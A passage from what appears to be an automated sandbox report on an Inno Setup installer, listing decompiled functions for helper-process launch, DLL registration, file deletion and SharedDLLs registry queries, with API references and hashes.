                                                            				_v96.cb = 0x44;
                                                            				E005C745C( &_v156);
                                                            				_t91 = E0040B278(_v156);
                                                            				_v176 = 0x69;
                                                            				_v172 = 0;
                                                            				_v168 = _v24;
                                                            				_v164 = 0;
                                                            				E004244F8(L"helper %d 0x%x", 1,  &_v176,  &_v160);
                                                            				_t97 = E0040B278(_v160);
                                                            				_t98 =  *0x6d6368; // 0x0
                                                            				if(CreateProcessW(E0040B278(_t98), _t97, 0, 0, 0xffffffff, 0xc000000, 0, _t91,  &_v96,  &_v112) == 0) {
                                                            					E0060CE84(L"CreateProcess");
                                                            				}
                                                            				 *((char*)(_t127 + 4)) = 1;
                                                            				 *((char*)(_t127 + 5)) = 0;
                                                            				 *(_t127 + 8) = _v112.hProcess;
                                                            				 *((intOrPtr*)(_t127 + 0x10)) = _v112.dwProcessId;
                                                            				 *((intOrPtr*)(_t127 + 0xc)) = _v20;
                                                            				_v20 = 0;
                                                            				CloseHandle(_v112.hThread);
                                                            				_v184 =  *((intOrPtr*)(_t127 + 0x10));
                                                            				_v180 = 0;
                                                            				E006163B4(L"Helper process PID: %u", _t127, 0,  &_v184, _t141, 0x6d636c);
                                                            				_pop(_t139);
                                                            				 *[fs:eax] = _t139;
                                                            				_push(E00625A01);
                                                            				return CloseHandle(_v24);
                                                            			}

                                                            0x0062587e
                                                            0x00625883
                                                            0x00625886
                                                            0x006258a9
                                                            0x006258b0
                                                            0x006258b7
                                                            0x006258b7
                                                            0x006258be
                                                            0x006258bf
                                                            0x006258c4
                                                            0x006258c7
                                                            0x006258ca
                                                            0x006258e4
                                                            0x006258eb
                                                            0x006258eb
                                                            0x006258fa
                                                            0x006258ff
                                                            0x00625914
                                                            0x0062591f
                                                            0x00625939
                                                            0x00625943
                                                            0x0062594d
                                                            0x00625953
                                                            0x0062596a
                                                            0x00625975
                                                            0x0062597b
                                                            0x0062598d
                                                            0x00625994
                                                            0x00625994
                                                            0x00625999
                                                            0x0062599d
                                                            0x006259a4
                                                            0x006259aa
                                                            0x006259b0
                                                            0x006259b5
                                                            0x006259bc
                                                            0x006259c4
                                                            0x006259ca
                                                            0x006259de
                                                            0x006259e5
                                                            0x006259e8
                                                            0x006259eb
                                                            0x006259f9

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 006257BC
                                                            • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                            • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CreateProcessW.KERNEL32 ref: 00625986
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                            • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                            • API String ID: 770386003-3271284199
                                                            • Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                            • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                            • Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                            • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E006B9138(char __ebx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				char _v21;
                                                            				signed int _v22;
                                                            				void* _v28;
                                                            				intOrPtr _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v60;
                                                            				void* _t62;
                                                            				signed int _t110;
                                                            				intOrPtr _t129;
                                                            				signed int _t130;
                                                            				char _t134;
                                                            				char _t139;
                                                            				char _t142;
                                                            				char* _t149;
                                                            				intOrPtr* _t158;
                                                            				void* _t159;
                                                            				intOrPtr _t181;
                                                            				intOrPtr _t189;
                                                            				intOrPtr _t190;
                                                            				intOrPtr _t192;
                                                            				intOrPtr _t196;
                                                            				intOrPtr _t199;
                                                            				intOrPtr* _t204;
                                                            				intOrPtr _t206;
                                                            				intOrPtr _t207;
                                                            				void* _t216;
                                                            
                                                            				_t216 = __fp0;
                                                            				_t202 = __edi;
                                                            				_t157 = __ebx;
                                                            				_t206 = _t207;
                                                            				_t159 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t159 = _t159 - 1;
                                                            				} while (_t159 != 0);
                                                            				_push(__ebx);
                                                            				_push(__edi);
                                                            				_t204 =  *0x6cdec4; // 0x6d579c
                                                            				_push(_t206);
                                                            				_push(0x6b94fd);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t207;
                                                            				E005C6FB0(1, __ebx,  &_v36, __edi, _t204);
                                                            				_t62 = E00422368(_v36, _t159, L"/REG");
                                                            				_t209 = _t62;
                                                            				if(_t62 != 0) {
                                                            					E005C6FB0(1, __ebx,  &_v40, __edi, _t204);
                                                            					__eflags = E00422368(_v40, _t159, L"/REGU");
                                                            					if(__eflags != 0) {
                                                            						__eflags = 0;
                                                            						_pop(_t181);
                                                            						 *[fs:eax] = _t181;
                                                            						_push(E006B9504);
                                                            						E0040A228( &_v60, 7);
                                                            						return E0040A228( &_v20, 4);
                                                            					} else {
                                                            						_v21 = 0;
                                                            						goto L6;
                                                            					}
                                                            				} else {
                                                            					_v21 = 1;
                                                            					L6:
                                                            					E005B8250( *_t204, L"Setup", _t209);
                                                            					ShowWindow( *( *_t204 + 0x188), 5);
                                                            					E006AF824();
                                                            					_v28 = E00413E90(0, 0, L"Inno-Setup-RegSvr-Mutex");
                                                            					ShowWindow( *( *_t204 + 0x188), 0);
                                                            					if(_v28 != 0) {
                                                            						do {
                                                            							E005B8704( *_t204);
                                                            						} while (MsgWaitForMultipleObjects(1,  &_v28, 0, 0xffffffff, 0x4ff) == 1);
                                                            					}
                                                            					ShowWindow( *( *_t204 + 0x188), 5);
                                                            					_push(_t206);
                                                            					_push(0x6b94ce);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t207;
                                                            					E005C6FB0(0, _t157,  &_v44, _t202, _t204);
                                                            					E005C4F90(_v44, _t157,  &_v8, L".msg", _t202, _t204);
                                                            					E005C6FB0(0, _t157,  &_v48, _t202, _t204);
                                                            					E005C4F90(_v48, _t157,  &_v12, L".lst", _t202, _t204);
                                                            					if(E005C685C(_v12) == 0) {
                                                            						E00423A20(_v12);
                                                            						E00423A20(_v8);
                                                            						_push(_t206);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t207;
                                                            						E006B9098(_t157,  &_v12, _t202, _t204, __eflags);
                                                            						_pop(_t189);
                                                            						 *[fs:eax] = _t189;
                                                            						_t190 = 0x6b949e;
                                                            						 *[fs:eax] = _t190;
                                                            						_push(E006B94D5);
                                                            						__eflags = _v28;
                                                            						if(_v28 != 0) {
                                                            							ReleaseMutex(_v28);
                                                            							return CloseHandle(_v28);
                                                            						}
                                                            						return 0;
                                                            					} else {
                                                            						E005CD6BC(_v8, _t157, 1, 0, _t202, _t204);
                                                            						_t110 =  *0x6cddd0; // 0x6d603c
                                                            						E005C9044(_t110 & 0xffffff00 | ( *(_t110 + 0x4c) & 0x00000001) != 0x00000000);
                                                            						_t192 =  *0x6cded8; // 0x6d5c28
                                                            						_t26 = _t192 + 0x2f8; // 0x0
                                                            						E005B8250( *_t204,  *_t26,  *(_t110 + 0x4c) & 0x00000001);
                                                            						_push(_t206);
                                                            						_push(0x6b946a);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t207;
                                                            						E006AC8CC(_t157,  *_t26, _t202, _t204);
                                                            						_v32 = E005CBFB8(1, 1, 0, 2);
                                                            						_push(_t206);
                                                            						_push(0x6b9450);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t207;
                                                            						while(E005CC258(_v32) == 0) {
                                                            							E005CC268(_v32, _t157,  &_v16, _t202, _t204, __eflags);
                                                            							_t157 = _v16;
                                                            							__eflags = _t157;
                                                            							if(_t157 != 0) {
                                                            								_t158 = _t157 - 4;
                                                            								__eflags = _t158;
                                                            								_t157 =  *_t158;
                                                            							}
                                                            							__eflags = _t157 - 4;
                                                            							if(__eflags > 0) {
                                                            								__eflags =  *_v16 - 0x5b;
                                                            								if(__eflags == 0) {
                                                            									__eflags =  *((short*)(_v16 + 6)) - 0x5d;
                                                            									if(__eflags == 0) {
                                                            										E0040B698(_v16, 0x7fffffff, 5,  &_v20);
                                                            										_t129 = _v16;
                                                            										__eflags =  *((short*)(_t129 + 4)) - 0x71;
                                                            										if( *((short*)(_t129 + 4)) == 0x71) {
                                                            											L19:
                                                            											_t130 = 1;
                                                            										} else {
                                                            											__eflags = _v21;
                                                            											if(_v21 == 0) {
                                                            												L18:
                                                            												_t130 = 0;
                                                            											} else {
                                                            												_t149 =  *0x6cdcc4; // 0x6d67df
                                                            												__eflags =  *_t149;
                                                            												if( *_t149 == 0) {
                                                            													goto L19;
                                                            												} else {
                                                            													goto L18;
                                                            												}
                                                            											}
                                                            										}
                                                            										_v22 = _t130;
                                                            										_push(_t206);
                                                            										_push(0x6b93c5);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t207;
                                                            										_t134 = ( *(_v16 + 2) & 0x0000ffff) - 0x53;
                                                            										__eflags = _t134;
                                                            										if(_t134 == 0) {
                                                            											_push(_v22 & 0x000000ff);
                                                            											E00624E78(0, _t157, _v20, 1, _t202, _t204, _t216);
                                                            										} else {
                                                            											_t139 = _t134 - 1;
                                                            											__eflags = _t139;
                                                            											if(_t139 == 0) {
                                                            												__eflags = 0;
                                                            												E006255F0(0, _t157, _v20, _t204, 0, _t216);
                                                            											} else {
                                                            												_t142 = _t139 - 0x1f;
                                                            												__eflags = _t142;
                                                            												if(_t142 == 0) {
                                                            													_push(_v22 & 0x000000ff);
                                                            													E00624E78(0, _t157, _v20, 0, _t202, _t204, _t216);
                                                            												} else {
                                                            													__eflags = _t142 - 1;
                                                            													if(__eflags == 0) {
                                                            														E0062460C(_v20, _t157, _t204);
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										_pop(_t199);
                                                            										 *[fs:eax] = _t199;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            						_pop(_t196);
                                                            						 *[fs:eax] = _t196;
                                                            						_push(E006B9457);
                                                            						return E00408444(_v32);
                                                            					}
                                                            				}
                                                            			}
                                                            0x006b94cd
                                                            0x006b9272
                                                            0x006b9279
                                                            0x006b927e
                                                            0x006b928a
                                                            0x006b928f
                                                            0x006b9295
                                                            0x006b929d
                                                            0x006b92a4
                                                            0x006b92a5
                                                            0x006b92aa
                                                            0x006b92ad
                                                            0x006b92b0
                                                            0x006b92ca
                                                            0x006b92cf
                                                            0x006b92d0
                                                            0x006b92d5
                                                            0x006b92d8
                                                            0x006b942a
                                                            0x006b92e6
                                                            0x006b92eb
                                                            0x006b92ee
                                                            0x006b92f0
                                                            0x006b92f2
                                                            0x006b92f2
                                                            0x006b92f5
                                                            0x006b92f5
                                                            0x006b92f7
                                                            0x006b92fa
                                                            0x006b9303
                                                            0x006b9307
                                                            0x006b9310
                                                            0x006b9315
                                                            0x006b932c
                                                            0x006b9331
                                                            0x006b9334
                                                            0x006b9339
                                                            0x006b934f
                                                            0x006b934f
                                                            0x006b933b
                                                            0x006b933b
                                                            0x006b933f
                                                            0x006b934b
                                                            0x006b934b
                                                            0x006b9341
                                                            0x006b9341
                                                            0x006b9346
                                                            0x006b9349
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x006b9349
                                                            0x006b933f
                                                            0x006b9351
                                                            0x006b9356
                                                            0x006b9357
                                                            0x006b935c
                                                            0x006b935f
                                                            0x006b9369
                                                            0x006b9369
                                                            0x006b936d
                                                            0x006b9398
                                                            0x006b93a0
                                                            0x006b936f
                                                            0x006b936f
                                                            0x006b936f
                                                            0x006b9372
                                                            0x006b93b4
                                                            0x006b93b6
                                                            0x006b9374
                                                            0x006b9374
                                                            0x006b9374
                                                            0x006b9378
                                                            0x006b9385
                                                            0x006b938d
                                                            0x006b937a
                                                            0x006b937a
                                                            0x006b937d
                                                            0x006b93aa
                                                            0x006b93aa
                                                            0x006b937d
                                                            0x006b9378
                                                            0x006b9372
                                                            0x006b93bd
                                                            0x006b93c0
                                                            0x006b93c0
                                                            0x006b9315
                                                            0x006b9307
                                                            0x006b92fa
                                                            0x006b943c
                                                            0x006b943f
                                                            0x006b9442
                                                            0x006b944f
                                                            0x006b944f
                                                            0x006b926c

                                                            APIs
                                                            • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                            • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                            • API String ID: 66301061-906243933
                                                            • Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                            • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                            • Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                            • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E00629850(char __eax, void* __ebx, signed char __edx, void* __edi, void* __esi, void* __fp0, char _a4, char _a8, intOrPtr _a12) {
                                                            				char _v5;
                                                            				char _v6;
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v60;
                                                            				void* __ecx;
                                                            				char _t65;
                                                            				void* _t69;
                                                            				void* _t112;
                                                            				signed char _t135;
                                                            				intOrPtr _t137;
                                                            				intOrPtr _t164;
                                                            				intOrPtr _t178;
                                                            				void* _t188;
                                                            				signed int _t189;
                                                            				char _t191;
                                                            				intOrPtr _t193;
                                                            				intOrPtr _t194;
                                                            
                                                            				_t210 = __fp0;
                                                            				_t187 = __edi;
                                                            				_t193 = _t194;
                                                            				_t137 = 6;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t137 = _t137 - 1;
                                                            				} while (_t137 != 0);
                                                            				_push(_t137);
                                                            				_t1 =  &_v8;
                                                            				_t138 =  *_t1;
                                                            				 *_t1 = _t137;
                                                            				_push(__edi);
                                                            				_v5 =  *_t1;
                                                            				_t135 = __edx;
                                                            				_t191 = __eax;
                                                            				_push(_t193);
                                                            				_push(0x629b12);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t194;
                                                            				_v6 = 1;
                                                            				E005C53D0(__eax,  &_v12);
                                                            				if(E00422368(_v12,  *_t1, L".hlp") != 0) {
                                                            					E005C53D0(_t191,  &_v24);
                                                            					_t65 = E00422368(_v24, _t138, L".chm");
                                                            					__eflags = _t65;
                                                            					if(_t65 == 0) {
                                                            						E005C4F90(_t191, _t135,  &_v28, L".chw", __edi, _t191);
                                                            						__eflags = 0;
                                                            						E00629850(_v28, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
                                                            						_pop(_t138);
                                                            					}
                                                            				} else {
                                                            					E005C4F90(_t191, _t135,  &_v16, L".gid", __edi, _t191);
                                                            					E00629850(_v16, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
                                                            					E005C4F90(_t191, _t135,  &_v20, L".fts", __edi, _t191);
                                                            					E00629850(_v20, _t135, _t135, _t187, _t191, __fp0, 0, 0, _a12);
                                                            					_pop(_t138);
                                                            				}
                                                            				E005C53D0(_t191,  &_v32);
                                                            				_t69 = E00422368(_v32, _t138, L".lnk");
                                                            				_t197 = _t69;
                                                            				if(_t69 == 0) {
                                                            					E00624924(_t191, _t135);
                                                            				}
                                                            				if(E0060C5F4(_t135, _t191, _t197) == 0) {
                                                            					L25:
                                                            					_pop(_t164);
                                                            					 *[fs:eax] = _t164;
                                                            					_push(E00629B19);
                                                            					E0040A228( &_v60, 5);
                                                            					return E0040A228( &_v32, 6);
                                                            				} else {
                                                            					_v40 = _t191;
                                                            					_v36 = 0x11;
                                                            					_t141 = 0;
                                                            					E006163B4(L"Deleting file: %s", _t135, 0,  &_v40, _t187, _t191);
                                                            					_t199 = _a4;
                                                            					if(_a4 != 0) {
                                                            						_t189 = E0060C330(_t135, _t191, _t199);
                                                            						if(_t189 != 0xffffffff) {
                                                            							_t201 = _t189 & 0x00000001;
                                                            							if((_t189 & 0x00000001) != 0) {
                                                            								_t141 = 0xfffffffe & _t189;
                                                            								_t112 = E0060C6DC(_t135, 0xfffffffe & _t189, _t191, _t201);
                                                            								_t202 = _t112;
                                                            								if(_t112 == 0) {
                                                            									E00616130(L"Failed to strip read-only attribute.", _t135, _t189, _t191);
                                                            								} else {
                                                            									E00616130(L"Stripped read-only attribute.", _t135, _t189, _t191);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					if(E0060C158(_t135, _t191, _t202) != 0) {
                                                            						__eflags = _v5;
                                                            						if(_v5 != 0) {
                                                            							SHChangeNotify(4, 5, E0040B278(_t191), 0);
                                                            							E005C5378(_t191, _t141,  &_v60);
                                                            							E00610640( *((intOrPtr*)(_a12 - 0x3c)), _t141, _v60, _t210);
                                                            						}
                                                            						goto L25;
                                                            					} else {
                                                            						_t188 = GetLastError();
                                                            						if(_a8 == 0 ||  *((char*)(_a12 - 0x29)) == 0) {
                                                            							L22:
                                                            							_v40 = _t188;
                                                            							_v36 = 0;
                                                            							E006163B4(L"Failed to delete the file; it may be in use (%d).", _t135, 0,  &_v40, _t188, _t191);
                                                            							_v6 = 0;
                                                            							goto L25;
                                                            						} else {
                                                            							if(_t188 == 5) {
                                                            								L20:
                                                            								if((E0060C330(_t135, _t191, _t207) & 0x00000001) != 0) {
                                                            									goto L22;
                                                            								}
                                                            								_v40 = _t188;
                                                            								_v36 = 0;
                                                            								E006163B4(L"The file appears to be in use (%d). Will delete on restart.", _t135, 0,  &_v40, _t188, _t191);
                                                            								_push(_t193);
                                                            								 *[fs:eax] = _t194;
                                                            								E0060D8B0(_t135, _t135, _t191, _t188, _t191);
                                                            								 *((char*)( *((intOrPtr*)(_a12 - 0x30)) + 0x1c)) = 1;
                                                            								E005C52C8(_t191,  &_v48, _t193,  *[fs:eax]);
                                                            								E005C5378(_v48, 0,  &_v44);
                                                            								E00610640( *((intOrPtr*)(_a12 + (_t135 & 0x000000ff) * 4 - 0x38)), _a12, _v44, _t210);
                                                            								_t178 = 0x629a6d;
                                                            								 *[fs:eax] = _t178;
                                                            								goto L25;
                                                            							}
                                                            							_t207 = _t188 - 0x20;
                                                            							if(_t188 != 0x20) {
                                                            								goto L22;
                                                            							}
                                                            							goto L20;
                                                            						}
                                                            					}
                                                            				}
                                                            			}






























                                                            0x00000000
                                                            0x00629a68
                                                            0x006299e9
                                                            0x006299ec
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x006299ec
                                                            0x006299d1
                                                            0x006299c0

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00629B12,?,?,?,?,00000005,00000000,00000000,?,?,0062AF86,00000000,00000000,?,00000000), ref: 006299C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                            • API String ID: 1452528299-3112430753
                                                            • Opcode ID: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                            • Instruction ID: 80e8b6ab9e5d3a552657306fa088f7fa642ecff14c11c84625059ee943e1d250
                                                            • Opcode Fuzzy Hash: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                            • Instruction Fuzzy Hash: D371E330B00B245FDB04EF68E851BEE77A6AF89710F14842DF801A7381DAB89D45CB79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0060E4D8(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				intOrPtr _v12;
                                                            				char _v13;
                                                            				void* _v20;
                                                            				char _v21;
                                                            				char _v28;
                                                            				int _v32;
                                                            				int _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char* _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				char* _v72;
                                                            				char _v76;
                                                            				char _v80;
                                                            				void* _t77;
                                                            				char _t98;
                                                            				char _t103;
                                                            				char* _t110;
                                                            				char _t133;
                                                            				char _t139;
                                                            				char _t144;
                                                            				void* _t168;
                                                            				short* _t169;
                                                            				char _t170;
                                                            				char _t172;
                                                            				intOrPtr _t189;
                                                            				intOrPtr _t194;
                                                            				intOrPtr _t196;
                                                            				void* _t207;
                                                            				void* _t208;
                                                            				intOrPtr _t209;
                                                            
                                                            				_t207 = _t208;
                                                            				_t209 = _t208 + 0xffffffb4;
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_v40 = 0;
                                                            				_v44 = 0;
                                                            				_v60 = 0;
                                                            				_v76 = 0;
                                                            				_v80 = 0;
                                                            				_v56 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = __edx;
                                                            				_push(_t207);
                                                            				_push(0x60e7be);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t209;
                                                            				_v13 = 0;
                                                            				_t168 = E005C7A14(_t77, L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v20, 3, 0);
                                                            				if(_t168 == 2) {
                                                            					L30:
                                                            					_pop(_t189);
                                                            					 *[fs:eax] = _t189;
                                                            					_push(E0060E7C5);
                                                            					E0040A228( &_v80, 2);
                                                            					E0040A228( &_v60, 2);
                                                            					E0040A228( &_v44, 2);
                                                            					return E0040A1C8( &_v8);
                                                            				} else {
                                                            					if(_t168 != 0) {
                                                            						E0060CF98(0x80000002,  &_v56, _t207);
                                                            						_v52 = _v56;
                                                            						_v48 = L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
                                                            						E005CD4D8(0x52, 1,  &_v52,  &_v44);
                                                            						_push(_v44);
                                                            						_push(L"\r\n\r\n");
                                                            						_v72 = L"RegOpenKeyEx";
                                                            						E00423004(_t168,  &_v76);
                                                            						_v68 = _v76;
                                                            						E005C857C(_t168,  &_v80);
                                                            						_v64 = _v80;
                                                            						E005CD4D8(0x48, 2,  &_v72,  &_v60);
                                                            						_push(_v60);
                                                            						E0040B550( &_v40, _t168, 3, __edi, __esi);
                                                            						E00429008(_v40, 1);
                                                            						E004098C4();
                                                            					}
                                                            					_push(_t207);
                                                            					_push(0x60e77a);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t209;
                                                            					_t169 = E0040B278(_v12);
                                                            					if(RegQueryValueExW(_v20, _t169, 0,  &_v32, 0,  &_v36) == 0) {
                                                            						_v21 = 0;
                                                            						_v28 = 0;
                                                            						_push(_t207);
                                                            						_push(0x60e6b8);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t209;
                                                            						_t98 = _v32 - 1;
                                                            						__eflags = _t98;
                                                            						if(_t98 == 0) {
                                                            							__eflags = E005C793C();
                                                            							if(__eflags != 0) {
                                                            								_v28 = E0042339C(_v8, __eflags);
                                                            								_v21 = 1;
                                                            							}
                                                            						} else {
                                                            							_t133 = _t98 - 2;
                                                            							__eflags = _t133;
                                                            							if(_t133 == 0) {
                                                            								__eflags = _v36 - 1;
                                                            								if(_v36 >= 1) {
                                                            									__eflags = _v36 - 4;
                                                            									if(_v36 <= 4) {
                                                            										_t139 = RegQueryValueExW(_v20, E0040B278(_v12), 0, 0,  &_v28,  &_v36);
                                                            										__eflags = _t139;
                                                            										if(_t139 == 0) {
                                                            											_v21 = 1;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								__eflags = _t133 == 1;
                                                            								if(_t133 == 1) {
                                                            									_v36 = 4;
                                                            									_t144 = RegQueryValueExW(_v20, _t169, 0, 0,  &_v28,  &_v36);
                                                            									__eflags = _t144;
                                                            									if(_t144 == 0) {
                                                            										_v21 = 1;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            						_pop(_t194);
